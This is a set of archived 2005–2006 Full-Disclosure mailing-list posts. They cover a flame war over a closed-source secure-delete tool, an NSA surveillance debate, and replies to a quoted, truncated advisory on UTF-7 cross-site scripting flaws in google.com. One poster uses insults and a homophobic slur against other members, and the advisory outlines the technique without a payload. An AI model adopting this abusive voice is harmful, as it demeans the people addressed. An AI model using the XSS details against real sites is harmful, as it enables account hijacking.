not everything is open source you know :-P its not like that its an exploit or something. it seems suddenly after this n3td0rk shit, everyone starts his own little flame wars over nothing. calm down people i didnt want to offend anyone with this release. my god if you dont have anything usefull to say, then why dont you stfu. - Original Message - From: J.A. Terranson [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, January 17, 2006 5:56 AM Subject: Re: [Full-disclosure] Secure Delete for Windows On Mon, 16 Jan 2006, GroundZero Security wrote: New version of GroundZero Secure Delete which also supports securely wiping of Free Space on a Device, has been released! A free trial can be downloaded here: http://www.groundzero-security.com/software/g0-SecureDelete-Trial.zip An exe? No source??? Just setup.exe Are you crazy? -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF 'The right of self defence is the first law of nature: in most governments it has been the study of rulers to confine this right within the narrowest limits possible. Wherever standing armies are kept up, and the right of the people to keep and bear arms is, under any colour or pretext whatsoever, prohibited, liberty, if not already annihilated, is on the brink of destruction.' St. George Tucker ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secure Delete for Windows
Our software works for NTFS and FAT filesystems and in the new version you can also wipe the free space to get rid of data that is left on unallocated portions of the disk. It was tested against encase which is one of the most popular recovery tools. (apparently has been used to recover data from disks that have been recovered from the WTC incident although we can not confirm that) We could not recover any data in our lab tests. We tested 7 different recovery tools, but encase is the most popular and we dont want to advertise for the rest too :) Our application has not only the DOD wiping standard, but also peter gutmanns algorythm with 38 random overwrites, which is the most secure wiping methode we know of. shred is ok but not good enough to really securely clean data. - Original Message - From: Michael Holstein [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tuesday, January 17, 2006 9:50 PM Subject: Re: [Full-disclosure] Secure Delete for Windows An exe? No source??? Just setup.exe Are you crazy? Or .. get GNU coreutils for windows : http://gnuwin32.sourceforge.net/packages/coreutils.htm and just use 'shred'. (although 'man shred' specifically makes note about journaled filesystems -- which NTFS is. I have not forensically analyzed the effectiveness of this tool on a specific file -- only on a block device). SysInternals also offers a freebie tool called 'sdelete'. Source for that is also available : http://www.sysinternals.com/Utilities/SDelete.html (and in the discussion about 'how sdelete works' they reference the same problem regarding journeled filesystems). If the emminently wise gent from GroundZero wishes to comment on how his perticular product addresses these issues, then that might be fodder for the list (versus the ongoing flames). Regards, Michael Holstein CISSP GCIA Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secure Delete for Windows
People who install software on their computers and connect them to networks then receive and process incoming data with those computers and said software do not want security, we just want full disclosure of the risks that we expose ourselves to by engaging in such unsafe behavior. why do people run firewalls,IDS or Anti Virus ? no they dont care about security, they just want to know whats the name of the virus that just hit their box, or see who may just be accessing their system as obviously noone is trying to be secure. you really made me realize all i need is full disclosure! who needs patches as long as you know what is vulnerable. why patch at least you KNOW whats buggy, right? If you're going to be part of the problem rather than part of the solution, if you intend to join the ranks of the self-interested software vendors who refuse to disclose the risk factors of installing and using your products, and also refuse to disclose the source code so that we can compile the code ourselves and therefore at least know where our machine code came from and what its source looks like, then you're the one who needs to stfu and go promptly out of business before you hurt somebody. oh oh i'm hurting people by not releasing the source! damn i'm so sorry! so any vendor that doesnt go open source is evil in your opinion ? well if you are so afraid you should start to code and write all the software that you need yourself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secure Delete for Windows
thank you. i didnt intend to cause such a huge response of nonsense and i execuse to the rest of the list members who didnt take part in this discussion, that they had so much trash in their inbox. it was only ment as small note of a updated version. i didnt send a huge advertising text, nor do i force people into buying or looking at it! i guess some people always have to say something, even if its nothing constructive. they have been too long on irc i guess :-) - Original Message - From: [EMAIL PROTECTED] To: sk [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, January 17, 2006 11:19 PM Subject: Re: [Full-disclosure] Secure Delete for Windows -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 it's against the charter true but it's tolerated because you arent the first to promote your tool and you won't be the last, idefense, immunity , cirt.dk , they promote all their works and I wish they will continue, just ignore the bad comments about this , or at least if it was comments from an useful person, but in this case, GTi has nothing to say on this list. sk wrote: thank you for the constructive feedback. at least it was usefull and not just some random flame. i do appriciate your comment, i dont agree with some points though. it may be the default business strategy, but if a single person (or a handfull) think they have to complain that i announce a security application here, i do argue about it. then again, i should better ignore such random bullshit as there will be always some smart ass who thinks he has to post a negative and senseless comment. I guess you only consider orders useful. I wonder how you respond to complaints about bugs? i'd appriciate it as then we can make the software more stable. thats only good. Remember! Swearing at your customers shows them who's boss! done with sarcasm ? ** this is not an endorsement or support of any community members, but rather an observation that it is typical business practice to treat even the most annoying potential customer with respect. i know that those arent even potential customers so thats why. a real customer, of course, will receive a friendly response. - Original Message - From: Yvan Boily [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, January 17, 2006 9:09 PM Subject: Re: [Full-disclosure] Secure Delete for Windows Now for the lesson on business communication: 1. Dealing with open source proponents: also not everyone posts their source so what is your fucking problem?! 2. Elliciting positive feedback: my god if you dont have anything usefull to say, then why dont you stfu. 3. Commenting on community members**: it seems suddenly after this n3td0rk shit, everyone starts his own little flame wars over nothing Remember! Swearing at your customers shows them who's boss! --- I guess you only consider orders useful. I wonder how you respond to complaints about bugs? Just a note; if you are going to market your product to people try to avoid making a negative impression! And certainly, reply to people individually as you will, but if you are going to blast someone then do it privately. I know this is not really my nature, but then again, I am not marketing products! ** this is not an endorsement or support of any community members, but rather an observation that it is typical business practice to treat even the most annoying potential customer with respect. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ81tfK+LRXunxpxfAQJ4KBAA4ndDGYC4f0L81XXFuH0uEajmvnmbwXku dvI6S1U9PzGNvrqHyh6OLruJidv7WfMbtFardfjL0/apzD+AMDT0gDAW6Wnc9Vik nKTuIRy2t3M/WSutHeoSuzPNQIwHFkhCPqiG3//YgjycTFRdcj1bFnlEkkXq19+K wzfTO5SheprKflVUzKm3cB2iwyC2BJ0BOWUUw2IsEJKdPR0RstkJTKlnjAzitUyQ eekz+2BE22UKx1BPPHi1v7c78Xhl8i/tXxfLxdhrS10gXM4JOnu2eWRVhKiuPw4m O/opNcpvBPfN0cNOuDQ/PoYFZjvdOBpH/k55zhiebIHPafQ+ViWfrCyiLsUzz0yp mumYc9TF9ZvzOojNbjQzdKGe1MGY/3cDi6iDsVLLnJY2lAOuRkPhEuZ34+s0jygY P60Nb189p0p3Tk+fadCGQOgZqypfzx8Du34aFTQIYP7V2LhYTKIuZZ7MnEyVJvXB Z5Pivr9VD7DUaKR0U8r/19YJqhe83ZpwONtbVqaKrjl0LCm1i57lQTdWhYV6N2Sj dxVr+DpTrN6OFPHT8zfy8Vb0ZdZgWJmfQTtg5eze+lr7oLFFqBMaqEfgG2R5Pj/t AsymXYSeTUcSWXToCCRy23uH69qq+MxWF5C5M3kfWsPMpV1odgxPSgkGrZP+n9f3 P+WQNCaShnA= =qH8x -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe
[Full-disclosure] Secure Delete for Windows
New version of GroundZero Secure Delete which also supports securely wiping of Free Space on a Device, has been released! A free trial can be downloaded here: http://www.groundzero-security.com/software/g0-SecureDelete-Trial.zip regards, GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Übermittlung unserer Daten für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG). pub 1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED] sub 2048g/2A3C7800 2004-09-27 Key fingerprint = A93E 41F8 7E82 5F2C 3E76 41F1 4BCF 3096 6992 8CB8 -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9 UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+ xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6 LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2 tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7 HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0 SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G 4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1 Ow== =E0o1 -END PGP PUBLIC KEY BLOCK- Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von Teilen dieser E-Mail ist nicht gestattet. This E-mail might contain confidential information. If you are not the right addressee or you have recived this Mail in error, please inform the Sender as soon as possible and delete this E-Mail immediately. You are not allowed to make any copies or relay this E-Mail. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trojan found on Linux server
if I grep my logs for wget, I see tons of attempts. you should use mod_security then. It blocks off all those script kidz and worms. sure a clever person is able to circumvent that too, but most of such scans are made by kids and worms so just configure mod_security for apache :-) regards, sk GroundZero Security Research and Software Development http://www.groundzero-security.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Spy Agency Mined Vast Data Trove
Well the harder we try to hide our data from the government the more they are going to think that you are an entity that needs to be taken down as a threat to the government be the government US, UK, Sweden, Norway, China, Japan, N/S Korea, Iraq, Iran, Pakistan, India, Africa. and down under. Yes, I missed just a few I am to lazy to list all of them. ok so you think its ok for any government on this planet to record all your data and process it on their systems. now go to google and see how many governement systems get compromised. if every nation spy's on you and saves the data, there is a higher chance that this data could be stolen. now dont tell me that those systems will be secured and junk as there is no such thing as a 100% secure system. i guess you'd be one of the first to complain about that ? or let me ask you, are you only ok with that your own government saves your data, or do you also have no problem if any other nation logs and profiles you ? i would so love to see some foreign spy agency getting busted by usa that they have been spying on u.s. people and then i would like to hear your comments aswell, or even better, the scenario i just said about compromised hosts of spy agencys. what if criminal organisations get the data ? they could blackmail you as they know about the girl you use to cheat on your wife, they got pictures of your kids and they know which dirty websites you visited. i mean this is just an example, but its not unlikely. so you see why its not a thing of having nothing to hide, but simply saving his own privacy. another thing is, just by hiding your private data it means you are a threat ?! what about a real life situation then, it would be the same if some agency sends agents to your house once in a while at night just to check that you dont hide anything. thats freedom for you ? isnt in americas law that every person has the right for privacy ? even if you have nothing to hide, you still should get your privacy, or do you want to feel beeing watched all the time whatever you do ? i dont know, but i wouldnt feel free if i knew any nation on the world (so hundreds of people) profile me and watch what i do even though i'm not a criminal. they dont have to see the pictures my friends send me or read all my emails to business partners where i signed a NDA and could get sue'd if information leaks. - Original Message - From: Leif Ericksen [EMAIL PROTECTED] To: Rodrigo Barbosa [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, December 28, 2005 3:32 PM Subject: Re: [Full-disclosure] Spy Agency Mined Vast Data Trove As was stated in previous post Echelon is old news, even Carnivore was supposedly dumped for newer technology. As I stated in a previous example the government can come in and request the keys if they need it. If that story that my prof told the class in 1988 was true. Now that story supposedly took place a few years before that class. so lets say that happened in 1982-198 is my best guess. The key is monitoring is being done. AS for the encryption. there are some that would argue that any STRONG encryption that is allowed to exist in the US ( PGP and the likes) has been modified by the NSA so that they have a generic key that will open any door. Otherwise the creator of such encryption will disappear and never comeback. IS this true or is this just a silly story. I do not know I have not invented an encryption system. I will let you know when I do if I am forced by the government to give a cracking method. ;) If the stories of the government having a back door key are true then I would be willing to bet that any technologically advance country would subscribe to the same plan to protect their own interests. Another thing to think about is just how many PRIMARY traffic points do we have that a majority of the traffic goes through. Lets see in the US we have MEA_EAT, MAE-WEST, MAE-CENTRAL, as well as others. (what were the locations... Hendron, VA, Chicago, IL, LA, CA, Dalas, or was it Huston TX. was there not near Central Florida?) Lets look at the UFO thought here for a moment. The governments deny that they exist so people really think and believe that they do exist. So much so that some are willing to put their lives at risk to break through the Govs defenses to prove that they know Aliens do exist. Well the harder we try to hide our data from the government the more they are going to think that you are an entity that needs to be taken down as a threat to the government be the government US, UK, Sweden, Norway, China, Japan, N/S Korea, Iraq, Iran, Pakistan, India, Africa. and down under. Yes, I missed just a few I am to lazy to list all of them. Now making complaints and noise about the problem is not going to do anything abut it. IF you know the problem exists and you have an answer start fighting in it a good way. Run for office on a platform to
Re: [Full-disclosure] complaints about the governemnt spying!
your last point was *IF* you are not doing *nothing illegal* and have nothing to hide no big deal. thats what i responded on. try to stick to your points :-) - Original Message - From: Leif Ericksen [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, December 28, 2005 6:08 PM Subject: [Full-disclosure] complaints about the governemnt spying! I know I know I have the answer. May of you really do not understand what I am saying. TO the point yes it is wrong, most people out there fail to understand what I am saying since I am not being very direct and to the point. My point is it is time to stop crying foul and do something about it. How about this if I setup a PayPal account how many people are willing to donate money to my cause (I will take money from anybody). I will run for Office and part of my promise will be to stop the US government from spying on people (Sorry, I can not help you with your government if you are not in the US, but I can try to build a diplomatic relationship and end it). I feel that IF I set up the account and I can get at least $1 million US in the account I will have enough money to get started on my campaign. My platform even though we should anticipate the government(s) to spy on us when we send a packet out into the wild, and we want to go into deepest Africa, the everglades of Florida or the LA swamps we can be secure in that no hard will come to us. (Well I will have to pay a political adviser to help me come up with a better platform so make that 1.5Mil unless you want to run with me and are a US citizen) lets make it our campaign! Any takers? -- Leif Ericksen -- Leif Ericksen [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Spy Agency Mined Vast Data Trove
the usa still controls the internet and they dont give a fuck if we feel that our privacy is invaded since we are all foreign countries to them and anything outside the usa should be sniffed as they could be potential terrorists. remember only usa is the free world lol (in their opinion) they want total control and noone can do anything against their actions. even nato is powerless against usa thats why noone ever says something if they fuck up. the us. gov knows that exactly. they dont have to execuse themselfs for things not even to their own people. if they are forced to give out information they lie their way out. manipulation is something the us gov is specialized in. with google earth you can even find a nsa echelon base in germany. i wonder what its doing there. i bet they use it to sniff our country aswell and our neighboors, since its not there for the fun of it. what if my country would start to spy on usa isp's ? that could cause serious political problems, but of course for usa everything is ok, as we have seen in the past. oh and for your law question, usa doesnt care about international laws. if you have problems you will have to ask a us. court and i doubt that will help you much complaining about some agency especially when you are from some foreign country. - Original Message - From: Bipin Gautam [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, December 26, 2005 4:04 PM Subject: [Full-disclosure] Spy Agency Mined Vast Data Trove hello list; story: http://www.securityfocus.com/brief/85 [snip]- At issue are the broad, sweeping powers the NSA now have to eavesdrop on Americans without their knowledge. Commentary from Ars technical speculates on the technology behind the massive eavesdropping. Bruce Schneier has a long commentary on historical abuses as well as the NSA's use of Echelon, a massive initiative that monitors voice, fax, and data communications and is used for data mining of perhaps 3 billion communications per day. [/snip]- My concern is... (I'm from Nepal) not all ISP in my region go through the Nepal's Internet exchange point. so even the local traffic might have routed through USA if our ISP'z backbone providr is in USA. I don't have very good idea about ledal stuff but my basic assumption is BUYING SERVICE FROM A DIFFERENT COUNTRY DOESN'T MEAN WE ARE NECESSARILY SUBJECTED TO THEIR LOCAL RULES. (though depends on country foreign policy) Have our network traffic been spyed/sniffed too without our knowledge? Don't we have right of protection in the law to check such thing if any??? just willing to hear your views on what are the rules to check/tackle such issues in other foreign countries??? regards, -bipint story: http://www.securityfocus.com/brief/85 [snip]- At issue are the broad, sweeping powers the NSA now have to eavesdrop on Americans without their knowledge. Commentary from Ars technical speculates on the technology behind the massive eavesdropping. Bruce Schneier has a long commentary on historical abuses as well as the NSA's use of Echelon, a massive initiative that monitors voice, fax, and data communications and is used for data mining of perhaps 3 billion communications per day. [/snip]- My concern is... (I'm from Nepal) not all ISP in my region go through the Nepal's Internet exchange point. so even the local traffic might have routed through USA if our ISP'z backbone providr is in USA. I don't have very good idea about ledal stuff but my basic assumption is BUYING SERVICE FROM A DIFFERENT COUNTRY DOESN'T MEAN WE ARE NECESSARILY SUBJECTED TO THEIR LOCAL RULES. (though depends on country foreign policy) Have our network traffic been spyed/sniffed too without our knowledge? Don't we have right of protection in the law to check such thing if any??? just willing to hear your views on what are the rules to check/tackle such issues in other foreign countries??? regards, -bipin -- Bipin Gautam Zeroth law of security: The possibility of poking a system from lower privilege is zero unless until there is possibility of direct, indirect or consequential communication between the two... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities in Google.com
i did not bash the other guy, i was just asking a question. as for you, yes you deserve to be bashed as you are a moron. you have no idea of security and you think with your geocities and google groups you look serious. grow up. get a few bucks and get a real domain. you better shut the fuck up. if you keep beeing an idiot, people will always take the piss out of you. by now you should have realized, but you simply ignore the tons of complains about you. funny that you still think you know whats going on. your really pathetic.. - Original Message - From: n3td3v [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 3:00 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You couldn't help but bash other peoples Google and Yahoo vulnerabilities. When you find your own, come back and bash other people. Until then, sit down, and learn from other peoples work. XSS will always remain part of the Full-Disclosure list if little GroundZero Security like it or not! /sarc on I hope you enjoy your continued rants about other peoples work, you'll go far in your career. /sarc off On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote: are we starting to post vulnerabilities in specific websites now rather than daemons/clients etc. ? i mean there are thousands of websites which are vulnerable to xss,sql injection or worse because of their custom scripts. in my opinion this should be posted to the website owners if you feel like, but its of no real use to the security community. hm another thing i'm wondering about is, is it legal to just audit a website without asking the owner if its ok ? how will he know its not a real attack? ok as for xss there cant be much harm done to the server itself, but what if, for example, you cause a DoS through testing certain variables for overflows ? - Original Message - From: Watchfire Research To: full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 1:58 PM Subject: [Full-disclosure] XSS vulnerabilities in Google.com //= Security Advisory =// - XSS vulnerabilities in Google.com - --[ Author: Yair Amit , Watchfire Corporation http://www.watchfire.com --[ Discovery Date: 15/11/2005 --[ Initial Vendor Response: 15/11/2005 --[ Issue solved: 01/12/2005 --[ Website: www.google.com --[ Severity: High --[ Summary Two XSS vulnerabilities were identified in the Google.com website, which allow an attacker to impersonate legitimate members of Google's services or to mount a phishing attack. Although Google uses common XSS countermeasures, a successful attack is possible, when using UTF-7 encoded payloads. --[ Background Google's URL redirection script - The script (http://www.google.com/url?q=...) is normally used for redirecting the browser from Google's website to other sites. For example, the following request will redirect the browser to http://www.watchfire.com : - http://www.google.com/url?q=http://www.watchfire.com When the parameter (q) is passed to the script with illegal format (The format seems to be: http://domain), a 403 Forbidden page returns to the user, informing that the query was illegal. The parameter's value appears in the html returned to the user. If http://www.google.com/url?q=USER_INPUT is requested, the text in the 403 Forbidden response would be: - Your client does not have permission to get URL /url?q=USER_INPUT from this server. The server response lacks charset encoding enforcement, such as: * Response headers: Content-Type: text/html; charset=[encoding]. * Response body: meta http-equiv=Content-Type (...) charset=[encoding]/. Google's 404 NOT FOUND mechanism - When requesting a page which doesn't exist under www.google.com, a 404 NOT FOUND response is returned to the user, with the original path requested. If http://www.google.com/NOTFOUND is requested, the following text appears in the response: Not Found The requested URL /NOTFOUND was not found on this server. The server response lacks charset encoding enforcement, such as: * Response headers: Content-Type: text/html; charset=[encoding]. * Response body: meta http-equiv=Content-Type (...) charset=[encoding]/. --[ XSS vulnerabilities While the aforementioned mechanisms (URL redirection script, 404 NOT FOUND) escape common characters used
Re: [Full-disclosure] XSS vulnerabilities in Google.com
google or yahoo, google or yahoo ..blah go find some real bugs noone is jealous of you, we just think its redicilous how you try to show off with your non existing skills and reputation. you are the greatest lamer i'v seen on this list sofar. so instead of braging about how great you are, you should actually try and learn about security then soon you will realize that your xss shit is just pathetic and nothing to be proud of. you think finding some simple xss in a website such as yahoo or google makes you superior to everyone else here ? 99% of the people on this list are more skilled than you, thats fact! so stop trying to show off it wont work. code a double free() remote exploit, then i would agree that you have skill. until you do that shut the fuck up kiddie. when i started over 11 years ago, you couldnt even spell the word computer. so please you should finally realize that you are at the wrong place. i mean look around how many people complain about you beeing annoying. oh and if you couldnt figure it out by now, groundzero is my company you little moron. -sk - Original Message - From: n3td3v [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 4:26 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com Your argument for having Google and Yahoo vulnerabilities (especially XSS) banned from FD is very poor. GroundZero or whoever you may be. Please get off the list and stop disrespecting others who do disclose vulnerabilities in Google And Yahoo On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote: Sure, but google != howardsblog.com. A large part of the population (including myself) relies on Google's various services for day-to-day use. I sure as hell would not feel comfortable knowing that I'm using a service that can potentially leak my information. i'm not talking about some shitty site that noone knows, but a lof of big websites have such vulnerabilities. That's quite a blanket statement to make. I'm sure a few people in the security community would like to know that there exists a vulnerability in a Google service. yeah maybe but if we end up posting about every site that offers services to users and has xss issues then this list would be reciving a flood of mails :P its not hard to test for xss, so if you are really so afraid of it go test it yourself and notify the website owner. No. But a site need not be audited to discover a bug. ah ok so you think illegal activity is the way to go ? you cant just audit any site you want you know, but hey if you want to get a visit from the feds why dont you audit some gov/mil i'm sure there are lots of xss to discover :P XSS can do a lot of harm. A compromised administrator account is generally a compromised server. There are some good XSS resources on the web you can read up on. no as they dont rely on /etc/passwd users but have their own database usually via mysql or so and a compromised admin user on some webinterface isnt always going to end up in compromise of the whole server unless the admin is stupid enough to use the same passwords for root and the webbased software. in most cases this will only end up in control of the web parts i.e. some forum. i agree that this is a problem, but its still not resulting in root access on the shell. oh and i dont have to read about it so keep your sarcasm to yourself. Then, my friend, you have discovered a bug. mhm sure, imagine you find a DoS in your precious google, then you would take them down and you really belive they would thank you for that ? you would be raided in no time. you think they would belive you that you did it only for a good cause ? yeah right... There are 10 types of people. Those who understand binary, and those who don't. you dont... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities in Google.com
yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding to the noise, but its just too tempting. i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist. btw my name is not groundzero, thats my company :) greetz -sk Http://www.groundzero-security.com - Original Message - From: php0t [EMAIL PROTECTED] To: 'GroundZero Security' [EMAIL PROTECTED] Sent: Wednesday, December 21, 2005 5:06 PM Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com hi, groundzero. I agree whole heartedly and the dood pisses me off too, just like everybody else. On the other hand, seeing him repeat google/yahoo again and again all the time and seeing the obvious-to-come replies makes my email alert fuck the mp3's up I'm listening to too often. My idea is this: how'bout each time the guy posts something ridiculous, all of us who are grasping our heads tearing our last pieces of hair out thniking to ourselves 'omfgwtfd00d' just write him a private email containing talk-to-the-hand or something? This would achieve two things: 1) less noise on the list 2) instead of being able to reply endlessly with bullcrap to the thread, he would just have to deal with nobody giving a fuck about him in public, still 10 emails saying 'I don't care' whenever he makes a post. Tell me if you think this sucks, it's just an idea. Php0t -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of GroundZero Security Sent: Wednesday, December 21, 2005 4:54 PM To: n3td3v Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com google or yahoo, google or yahoo ..blah go find some real bugs noone is jealous of you, we just think its redicilous how you try to show off with your non existing skills and reputation. you are the greatest lamer i'v seen on this list sofar. so instead of braging about how great you are, you should actually try and learn about security then soon you will realize that your xss shit is just pathetic and nothing to be proud of. you think finding some simple xss in a website such as yahoo or google makes you superior to everyone else here ? 99% of the people on this list are more skilled than you, thats fact! so stop trying to show off it wont work. code a double free() remote exploit, then i would agree that you have skill. until you do that shut the fuck up kiddie. when i started over 11 years ago, you couldnt even spell the word computer. so please you should finally realize that you are at the wrong place. i mean look around how many people complain about you beeing annoying. oh and if you couldnt figure it out by now, groundzero is my company you little moron. -sk - Original Message - From: n3td3v [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 21, 2005 4:26 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com Your argument for having Google and Yahoo vulnerabilities (especially XSS) banned from FD is very poor. GroundZero or whoever you may be. Please get off the list and stop disrespecting others who do disclose vulnerabilities in Google And Yahoo On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote: Sure, but google != howardsblog.com. A large part of the population (including myself) relies on Google's various services for day-to-day use. I sure as hell would not feel comfortable knowing that I'm using a service that can potentially leak my information. i'm not talking about some shitty site that noone knows, but a lof of big websites have such vulnerabilities. That's quite a blanket statement to make. I'm sure a few people in the security community would like to know that there exists a vulnerability in a Google service. yeah maybe but if we end up posting about every site that offers services to users and has xss issues then this list would be reciving a flood of mails :P its not hard to test for xss, so if you are really so afraid of it go test it yourself and notify the website owner. No. But a site need not be audited to discover a bug. ah ok so you think illegal activity is the way to go ? you cant just audit any site you want you know, but hey if you want to get a visit from the feds why dont you audit some gov/mil i'm sure there are lots of xss to discover :P XSS can do a lot of harm. A compromised administrator account is generally a compromised server. There are some good XSS resources on the web you can read up on. no as they dont rely on /etc/passwd users but have their own database usually
Re: [Full-disclosure] XSS vulnerabilities in Google.com
